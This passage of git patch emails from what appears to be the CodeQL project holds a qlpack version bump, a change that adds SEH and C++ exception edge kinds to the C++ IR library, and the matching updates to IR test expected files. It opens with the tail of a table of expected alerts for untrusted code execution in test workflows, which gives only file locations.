Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 9a137db12bbd01402c897653f32e896f767f2f29 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 20 Nov 2024 15:36:20 +0100 Subject: [PATCH 0708/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b72f94d1bb1..d938d0617e9 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.0 +version: 0.2.1 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a9f045567b0..99ac2c74011 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.0 +version: 0.2.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4078d79f2a0a1ae9132ae19394970c0e6b743fef Mon Sep 17 00:00:00 2001 From: "REDMOND\\brodes" Date: Wed, 20 Nov 2024 14:37:32 -0500 Subject: [PATCH 0709/1267] Adds SEH exception edge types, disjoint from normal C++ edges. Does not apply the edges yet, just stipulates the types. --- .../code/cpp/ir/implementation/EdgeKind.qll | 20 ++++++++++++++++--- .../raw/internal/TranslatedCall.qll | 2 +- .../raw/internal/TranslatedExpr.qll | 4 ++-- .../raw/internal/TranslatedStmt.qll | 2 +- 4 files changed, 21 insertions(+), 7 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 81db183fa63..38e20b65191 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -3,12 +3,13 @@ */ private import internal.EdgeKindInternal +private import codeql.util.Boolean private newtype TEdgeKind = TGotoEdge() or // Single successor (including fall-through) TTrueEdge() or // 'true' edge of conditional branch TFalseEdge() or // 'false' edge of conditional branch - TExceptionEdge() or // Thrown exception + TExceptionEdge(Boolean isSeh) or // Thrown exception, true for SEH exceptions, false otherwise TDefaultEdge() or // 'default' label of switch TCaseEdge(string minValue, string maxValue) { // Case label of switch @@ -54,7 +55,18 @@ class FalseEdge extends EdgeKind, TFalseEdge { * instruction's evaluation throws an exception. */ class ExceptionEdge extends EdgeKind, TExceptionEdge { - final override string toString() { result = "Exception" } + Boolean isSeh; //true for Structured Exception Handling, false for C++ exceptions + + ExceptionEdge() { this = TExceptionEdge(isSeh) } + + /** + * Holds if the exception is a Structured Exception Handling (SEH) exception. + */ + final predicate isSeh() { isSeh = true } + + final override string toString() { + if isSeh = true then result = "SEH Exception" else result = "C++ Exception" + } } /** @@ -122,8 +134,10 @@ module EdgeKind { /** * Gets the single instance of the `ExceptionEdge` class. + * Gets the instance of the `ExceptionEdge` class. + * `isSeh` is true if the exception is an SEH exception, and false for a C++ edge. */ - ExceptionEdge exceptionEdge() { result = TExceptionEdge() } + ExceptionEdge exceptionEdge(Boolean isSeh) { result = TExceptionEdge(isSeh) } /** * Gets the single instance of the `DefaultEdge` class. diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll index daa6bdaafcf..16352ffaf7c 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll @@ -88,7 +88,7 @@ abstract class TranslatedCall extends TranslatedExpr { result = this.getParent().getChildSuccessor(this, kind) or this.mayThrowException() and - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll index e7ccac24eb9..5dc22a810f1 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll @@ -3039,7 +3039,7 @@ class TranslatedDestructorsAfterThrow extends TranslatedElement, TTranslatedDest or // And otherwise, exit this element with an exceptional edge not exists(this.getChild(id + 1)) and - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } @@ -3078,7 +3078,7 @@ abstract class TranslatedThrowExpr extends TranslatedNonConstantExpr { result = this.getDestructors().getFirstInstruction(kind) or not exists(this.getDestructors()) and - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll index e37df72abbd..5f70a21fdb8 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll @@ -932,7 +932,7 @@ class TranslatedCatchByTypeHandler extends TranslatedHandler { kind instanceof GotoEdge and result = this.getParameter().getFirstInstruction(kind) or - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and if exists(this.getDestructors()) then result = this.getDestructors().getFirstInstruction(any(GotoEdge edge)) else result = this.getParent().(TranslatedTryStmt).getNextHandler(this, any(GotoEdge edge)) From 007dd837994ae0105c9cd8d4d5f2abfaeef0944c Mon Sep 17 00:00:00 2001 From: "REDMOND\\brodes" Date: Wed, 20 Nov 2024 14:40:58 -0500 Subject: [PATCH 0710/1267] Updating ir test expected files. --- .../library-tests/ir/ir/aliased_ir.expected | 58 +++++++-------- .../test/library-tests/ir/ir/raw_ir.expected | 74 +++++++++---------- 2 files changed, 66 insertions(+), 66 deletions(-) diff --git a/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected b/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected index 28fde3672d9..224ac9a0ed9 100644 --- a/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected +++ b/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected @@ -2490,7 +2490,7 @@ destructors_for_temps.cpp: # 47| v47_6(void) = ^IndirectReadSideEffect[-1] : &:r47_1, ~m47_5 # 47| m47_7(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r47_1 # 47| m47_8(unknown) = Chi : total:m47_5, partial:m47_7 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 47| Block 4 # 47| v47_9(void) = NoOp : @@ -2574,7 +2574,7 @@ destructors_for_temps.cpp: # 52| v52_6(void) = ^IndirectReadSideEffect[-1] : &:r52_1, ~m52_5 # 52| m52_7(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r52_1 # 52| m52_8(unknown) = Chi : total:m52_5, partial:m52_7 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 51| Block 4 # 51| r51_32(glval) = VariableAddress[#temp51:75] : @@ -2656,7 +2656,7 @@ destructors_for_temps.cpp: # 55| m55_29(ClassWithConstructor) = ^IndirectMayWriteSideEffect[-1] : &:r55_5 # 55| m55_30(unknown) = Chi : total:m55_28, partial:m55_29 # 55| v55_31(void) = ThrowValue : &:r55_5, ~m55_30 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 55| Block 4 # 55| r55_32(glval) = VariableAddress[#temp55:75] : @@ -2721,7 +2721,7 @@ destructors_for_temps.cpp: # 59| m59_20(unknown) = Chi : total:m59_17, partial:m59_19 # 59| m59_21(char) = Store[#throw59:9] : &:r59_4, r59_15 # 59| v59_22(void) = ThrowValue : &:r59_4, m59_21 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 59| Block 4 # 59| r59_23(char) = Constant[97] : @@ -3120,7 +3120,7 @@ ir.c: # 25| v25_4(void) = Call[ExRaiseAccessViolation] : func:r25_1, 0:r25_3 # 25| m25_5(unknown) = ^CallSideEffect : ~m21_4 # 25| m25_6(unknown) = Chi : total:m21_4, partial:m25_5 -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 26| Block 1 # 26| r26_1(int) = Constant[0] : @@ -3167,7 +3167,7 @@ ir.c: # 36| v36_3(void) = Call[ExRaiseAccessViolation] : func:r36_1, 0:r36_2 # 36| m36_4(unknown) = ^CallSideEffect : ~m32_4 # 36| m36_5(unknown) = Chi : total:m32_4, partial:m36_4 -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 # 32| Block 1 # 32| v32_5(void) = Unwind : @@ -3202,7 +3202,7 @@ ir.c: # 40| v40_3(void) = Call[ExRaiseAccessViolation] : func:r40_1, 0:r40_2 # 40| m40_4(unknown) = ^CallSideEffect : ~m36_5 # 40| m40_5(unknown) = Chi : total:m36_5, partial:m40_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 32| Block 6 # 32| v32_8(void) = Unreached : @@ -3241,7 +3241,7 @@ ir.c: # 62| v62_3(void) = Call[ExRaiseAccessViolation] : func:r62_1, 0:r62_2 # 62| m62_4(unknown) = ^CallSideEffect : ~m57_4 # 62| m62_5(unknown) = Chi : total:m57_4, partial:m62_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 66| Block 1 # 66| r66_1(int) = Constant[1] : @@ -3263,7 +3263,7 @@ ir.c: # 73| v73_3(void) = Call[ExRaiseAccessViolation] : func:r73_1, 0:r73_2 # 73| m73_4(unknown) = ^CallSideEffect : ~m70_4 # 73| m73_5(unknown) = Chi : total:m70_4, partial:m73_4 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 70| Block 1 # 70| v70_5(void) = Unwind : @@ -3276,7 +3276,7 @@ ir.c: # 76| v76_3(void) = Call[ExRaiseAccessViolation] : func:r76_1, 0:r76_2 # 76| m76_4(unknown) = ^CallSideEffect : ~m73_5 # 76| m76_5(unknown) = Chi : total:m73_5, partial:m76_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 80| void raise_access_violation() # 80| Block 0 @@ -3289,7 +3289,7 @@ ir.c: # 81| v81_3(void) = Call[ExRaiseAccessViolation] : func:r81_1, 0:r81_2 # 81| m81_4(unknown) = ^CallSideEffect : ~m80_4 # 81| m81_5(unknown) = Chi : total:m80_4, partial:m81_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 80| Block 1 # 80| v80_5(void) = Unwind : @@ -6976,7 +6976,7 @@ ir.cpp: # 728| r728_3(char *) = Convert : r728_2 # 728| m728_4(char *) = Store[#throw728:7] : &:r728_1, r728_3 # 728| v728_5(void) = ThrowValue : &:r728_1, m728_4 -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 730| Block 4 # 730| r730_1(glval) = VariableAddress[x] : @@ -6995,7 +6995,7 @@ ir.cpp: # 735| Block 6 # 735| v735_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 8 +#-----| C++ Exception -> Block 8 #-----| Goto -> Block 7 # 735| Block 7 @@ -7017,11 +7017,11 @@ ir.cpp: # 736| m736_11(String) = ^IndirectMayWriteSideEffect[-1] : &:r736_1 # 736| m736_12(unknown) = Chi : total:m736_9, partial:m736_11 # 736| v736_13(void) = ThrowValue : &:r736_1, ~m736_12 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 738| Block 8 # 738| v738_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 10 +#-----| C++ Exception -> Block 10 #-----| Goto -> Block 9 # 738| Block 9 @@ -7035,7 +7035,7 @@ ir.cpp: # 740| Block 10 # 740| v740_1(void) = CatchAny : # 741| v741_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 743| Block 11 # 743| v743_1(void) = NoOp : @@ -9943,7 +9943,7 @@ ir.cpp: # 1195| r1195_3(char *) = Convert : r1195_2 # 1195| m1195_4(char *) = Store[#throw1195:7] : &:r1195_1, r1195_3 # 1195| v1195_5(void) = ThrowValue : &:r1195_1, m1195_4 -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 1197| Block 4 # 1197| r1197_1(glval) = VariableAddress[x] : @@ -9962,7 +9962,7 @@ ir.cpp: # 1202| Block 6 # 1202| v1202_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 8 +#-----| C++ Exception -> Block 8 #-----| Goto -> Block 7 # 1202| Block 7 @@ -9984,11 +9984,11 @@ ir.cpp: # 1203| m1203_11(String) = ^IndirectMayWriteSideEffect[-1] : &:r1203_1 # 1203| m1203_12(unknown) = Chi : total:m1203_9, partial:m1203_11 # 1203| v1203_13(void) = ThrowValue : &:r1203_1, ~m1203_12 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 1205| Block 8 # 1205| v1205_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 #-----| Goto -> Block 9 # 1205| Block 9 @@ -16924,7 +16924,7 @@ ir.cpp: # 2281| v2281_6(void) = ^IndirectReadSideEffect[-1] : &:r2281_1, ~m2281_5 # 2281| m2281_7(String) = ^IndirectMayWriteSideEffect[-1] : &:r2281_1 # 2281| m2281_8(unknown) = Chi : total:m2281_5, partial:m2281_7 -#-----| Exception -> Block 5 +#-----| C++ Exception -> Block 5 # 2280| Block 4 # 2280| r2280_1(glval) = VariableAddress[s2] : @@ -16956,7 +16956,7 @@ ir.cpp: # 2282| Block 5 # 2282| v2282_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 7 +#-----| C++ Exception -> Block 7 #-----| Goto -> Block 6 # 2282| Block 6 @@ -16978,11 +16978,11 @@ ir.cpp: # 2283| m2283_11(String) = ^IndirectMayWriteSideEffect[-1] : &:r2283_1 # 2283| m2283_12(unknown) = Chi : total:m2283_9, partial:m2283_11 # 2283| v2283_13(void) = ThrowValue : &:r2283_1, ~m2283_12 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2285| Block 7 # 2285| v2285_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 #-----| Goto -> Block 8 # 2285| Block 8 @@ -16996,7 +16996,7 @@ ir.cpp: # 2287| Block 9 # 2287| v2287_1(void) = CatchAny : # 2288| v2288_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2290| Block 10 # 2290| m2290_1(unknown) = Phi : from 4:~m2281_24, from 8:~m2281_8 @@ -18266,7 +18266,7 @@ ir.cpp: # 2454| v2454_6(void) = ^IndirectReadSideEffect[-1] : &:r2454_1, m2452_8 # 2454| m2454_7(ClassWithDestructor) = ^IndirectMayWriteSideEffect[-1] : &:r2454_1 # 2454| m2454_8(ClassWithDestructor) = Chi : total:m2452_8, partial:m2454_7 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 2451| Block 1 # 2451| v2451_7(void) = Unwind : @@ -18693,7 +18693,7 @@ ir.cpp: # 2537| r2537_2(int) = Constant[42] : # 2537| m2537_3(int) = Store[#throw2537:5] : &:r2537_1, r2537_2 # 2537| v2537_4(void) = ThrowValue : &:r2537_1, m2537_3 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2534| Block 1 # 2534| m2534_5(unknown) = Phi : from 3:~m2541_6, from 4:~m2541_14 @@ -18702,7 +18702,7 @@ ir.cpp: # 2539| Block 2 # 2539| v2539_1(void) = CatchByType[char] : -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 #-----| Goto -> Block 3 # 2539| Block 3 @@ -38962,7 +38962,7 @@ try_except.cpp: # 48| r48_2(int) = Constant[1] : # 48| m48_3(int) = Store[#throw48:13] : &:r48_1, r48_2 # 48| v48_4(void) = ThrowValue : &:r48_1, m48_3 -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 # 51| Block 2 # 51| r51_1(int) = Constant[0] : diff --git a/cpp/ql/test/library-tests/ir/ir/raw_ir.expected b/cpp/ql/test/library-tests/ir/ir/raw_ir.expected index 0093a108577..8600049dd22 100644 --- a/cpp/ql/test/library-tests/ir/ir/raw_ir.expected +++ b/cpp/ql/test/library-tests/ir/ir/raw_ir.expected @@ -822,7 +822,7 @@ coroutines.cpp: #-----| Block 6 #-----| v0_24(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 87| Block 7 # 87| r87_52(glval) = VariableAddress[(unnamed local variable)] : @@ -1001,7 +1001,7 @@ coroutines.cpp: #-----| Block 6 #-----| v0_28(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 91| Block 7 # 91| r91_54(glval) = VariableAddress[(unnamed local variable)] : @@ -1239,7 +1239,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_34(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 95| Block 9 # 95| r95_54(glval) = VariableAddress[(unnamed local variable)] : @@ -1469,7 +1469,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_27(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 99| Block 9 # 99| r99_54(glval) = VariableAddress[(unnamed local variable)] : @@ -1707,7 +1707,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_34(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 103| Block 9 # 103| r103_54(glval) = VariableAddress[(unnamed local variable)] : @@ -1949,7 +1949,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_34(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 108| Block 9 # 108| r108_54(glval) = VariableAddress[(unnamed local variable)] : @@ -2350,7 +2350,7 @@ destructors_for_temps.cpp: # 47| mu47_4(unknown) = ^CallSideEffect : ~m? # 47| v47_5(void) = ^IndirectReadSideEffect[-1] : &:r47_1, ~m? # 47| mu47_6(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r47_1 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 47| Block 4 # 47| v47_7(void) = NoOp : @@ -2417,7 +2417,7 @@ destructors_for_temps.cpp: # 52| mu52_4(unknown) = ^CallSideEffect : ~m? # 52| v52_5(void) = ^IndirectReadSideEffect[-1] : &:r52_1, ~m? # 52| mu52_6(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r52_1 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 51| Block 4 # 51| r51_24(glval) = VariableAddress[#temp51:75] : @@ -2484,7 +2484,7 @@ destructors_for_temps.cpp: # 55| mu55_21(unknown) = ^CallSideEffect : ~m? # 55| mu55_22(ClassWithConstructor) = ^IndirectMayWriteSideEffect[-1] : &:r55_5 # 55| v55_23(void) = ThrowValue : &:r55_5, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 55| Block 4 # 55| r55_24(glval) = VariableAddress[#temp55:75] : @@ -2539,7 +2539,7 @@ destructors_for_temps.cpp: # 59| mu59_15(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r59_5 # 59| mu59_16(char) = Store[#throw59:9] : &:r59_4, r59_12 # 59| v59_17(void) = ThrowValue : &:r59_4, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 59| Block 4 # 59| r59_18(char) = Constant[97] : @@ -2884,7 +2884,7 @@ ir.c: # 25| r25_3(int) = Load[x] : &:r25_2, ~m? # 25| v25_4(void) = Call[ExRaiseAccessViolation] : func:r25_1, 0:r25_3 # 25| mu25_5(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 21| Block 1 # 21| v21_6(void) = AliasedUse : ~m? @@ -2941,7 +2941,7 @@ ir.c: # 36| r36_2(int) = Constant[0] : # 36| v36_3(void) = Call[ExRaiseAccessViolation] : func:r36_1, 0:r36_2 # 36| mu36_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 5 +#-----| C++ Exception -> Block 5 # 32| Block 1 # 32| v32_4(void) = AliasedUse : ~m? @@ -2977,7 +2977,7 @@ ir.c: # 40| r40_2(int) = Constant[1] : # 40| v40_3(void) = Call[ExRaiseAccessViolation] : func:r40_1, 0:r40_2 # 40| mu40_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 42| Block 7 # 42| v42_1(void) = NoOp : @@ -3022,7 +3022,7 @@ ir.c: # 62| r62_2(int) = Constant[0] : # 62| v62_3(void) = Call[ExRaiseAccessViolation] : func:r62_1, 0:r62_2 # 62| mu62_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 57| Block 1 # 57| v57_4(void) = AliasedUse : ~m? @@ -3049,7 +3049,7 @@ ir.c: # 73| r73_2(int) = Constant[0] : # 73| v73_3(void) = Call[ExRaiseAccessViolation] : func:r73_1, 0:r73_2 # 73| mu73_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 70| Block 1 # 70| v70_4(void) = AliasedUse : ~m? @@ -3064,7 +3064,7 @@ ir.c: # 76| r76_2(int) = Constant[0] : # 76| v76_3(void) = Call[ExRaiseAccessViolation] : func:r76_1, 0:r76_2 # 76| mu76_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 78| Block 4 # 78| v78_1(void) = NoOp : @@ -3080,7 +3080,7 @@ ir.c: # 81| r81_2(int) = Constant[1] : # 81| v81_3(void) = Call[ExRaiseAccessViolation] : func:r81_1, 0:r81_2 # 81| mu81_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 80| Block 1 # 80| v80_4(void) = AliasedUse : ~m? @@ -6615,7 +6615,7 @@ ir.cpp: # 728| r728_3(char *) = Convert : r728_2 # 728| mu728_4(char *) = Store[#throw728:7] : &:r728_1, r728_3 # 728| v728_5(void) = ThrowValue : &:r728_1, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 730| Block 4 # 730| r730_1(glval) = VariableAddress[x] : @@ -6654,7 +6654,7 @@ ir.cpp: # 731| v731_18(void) = ^BufferReadSideEffect[0] : &:r731_15, ~m? # 731| mu731_19(String) = ^IndirectMayWriteSideEffect[-1] : &:r731_11 # 731| v731_20(void) = ThrowValue : &:r731_11, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 733| Block 8 # 733| r733_1(int) = Constant[7] : @@ -6664,7 +6664,7 @@ ir.cpp: # 735| Block 9 # 735| v735_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 11 +#-----| C++ Exception -> Block 11 #-----| Goto -> Block 10 # 735| Block 10 @@ -6682,11 +6682,11 @@ ir.cpp: # 736| v736_8(void) = ^BufferReadSideEffect[0] : &:r736_5, ~m? # 736| mu736_9(String) = ^IndirectMayWriteSideEffect[-1] : &:r736_1 # 736| v736_10(void) = ThrowValue : &:r736_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 738| Block 11 # 738| v738_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 13 +#-----| C++ Exception -> Block 13 #-----| Goto -> Block 12 # 738| Block 12 @@ -6700,7 +6700,7 @@ ir.cpp: # 740| Block 13 # 740| v740_1(void) = CatchAny : # 741| v741_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 743| Block 14 # 743| v743_1(void) = NoOp : @@ -9285,7 +9285,7 @@ ir.cpp: # 1195| r1195_3(char *) = Convert : r1195_2 # 1195| mu1195_4(char *) = Store[#throw1195:7] : &:r1195_1, r1195_3 # 1195| v1195_5(void) = ThrowValue : &:r1195_1, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 1197| Block 4 # 1197| r1197_1(glval) = VariableAddress[x] : @@ -9324,7 +9324,7 @@ ir.cpp: # 1198| v1198_18(void) = ^BufferReadSideEffect[0] : &:r1198_15, ~m? # 1198| mu1198_19(String) = ^IndirectMayWriteSideEffect[-1] : &:r1198_11 # 1198| v1198_20(void) = ThrowValue : &:r1198_11, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 1200| Block 8 # 1200| r1200_1(int) = Constant[7] : @@ -9334,7 +9334,7 @@ ir.cpp: # 1202| Block 9 # 1202| v1202_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 11 +#-----| C++ Exception -> Block 11 #-----| Goto -> Block 10 # 1202| Block 10 @@ -9352,11 +9352,11 @@ ir.cpp: # 1203| v1203_8(void) = ^BufferReadSideEffect[0] : &:r1203_5, ~m? # 1203| mu1203_9(String) = ^IndirectMayWriteSideEffect[-1] : &:r1203_1 # 1203| v1203_10(void) = ThrowValue : &:r1203_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 1205| Block 11 # 1205| v1205_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 #-----| Goto -> Block 12 # 1205| Block 12 @@ -15571,7 +15571,7 @@ ir.cpp: # 2281| mu2281_4(unknown) = ^CallSideEffect : ~m? # 2281| v2281_5(void) = ^IndirectReadSideEffect[-1] : &:r2281_1, ~m? # 2281| mu2281_6(String) = ^IndirectMayWriteSideEffect[-1] : &:r2281_1 -#-----| Exception -> Block 5 +#-----| C++ Exception -> Block 5 # 2280| Block 4 # 2280| r2280_1(glval) = VariableAddress[s2] : @@ -15596,7 +15596,7 @@ ir.cpp: # 2282| Block 5 # 2282| v2282_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 7 +#-----| C++ Exception -> Block 7 #-----| Goto -> Block 6 # 2282| Block 6 @@ -15614,11 +15614,11 @@ ir.cpp: # 2283| v2283_8(void) = ^BufferReadSideEffect[0] : &:r2283_5, ~m? # 2283| mu2283_9(String) = ^IndirectMayWriteSideEffect[-1] : &:r2283_1 # 2283| v2283_10(void) = ThrowValue : &:r2283_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2285| Block 7 # 2285| v2285_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 #-----| Goto -> Block 8 # 2285| Block 8 @@ -15632,7 +15632,7 @@ ir.cpp: # 2287| Block 9 # 2287| v2287_1(void) = CatchAny : # 2288| v2288_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2290| Block 10 # 2290| v2290_1(void) = NoOp : @@ -16699,7 +16699,7 @@ ir.cpp: # 2454| mu2454_4(unknown) = ^CallSideEffect : ~m? # 2454| v2454_5(void) = ^IndirectReadSideEffect[-1] : &:r2454_1, ~m? # 2454| mu2454_6(ClassWithDestructor) = ^IndirectMayWriteSideEffect[-1] : &:r2454_1 -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 2451| Block 1 # 2451| v2451_6(void) = AliasedUse : ~m? @@ -17102,7 +17102,7 @@ ir.cpp: # 2537| r2537_2(int) = Constant[42] : # 2537| mu2537_3(int) = Store[#throw2537:5] : &:r2537_1, r2537_2 # 2537| v2537_4(void) = ThrowValue : &:r2537_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2534| Block 1 # 2534| v2534_4(void) = AliasedUse : ~m? @@ -17110,7 +17110,7 @@ ir.cpp: # 2539| Block 2 # 2539| v2539_1(void) = CatchByType[char] : -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 #-----| Goto -> Block 3 # 2539| Block 3 @@ -37343,7 +37343,7 @@ try_except.cpp: # 48| r48_2(int) = Constant[1] : # 48| mu48_3(int) = Store[#throw48:13] : &:r48_1, r48_2 # 48| v48_4(void) = ThrowValue : &:r48_1, ~m? -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 51| Block 4 # 51| r51_1(int) = Constant[0] : From 6130679c3440bf08201bb5e933ca5347c804950a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 26 Nov 2024 10:16:09 +0000 Subject: 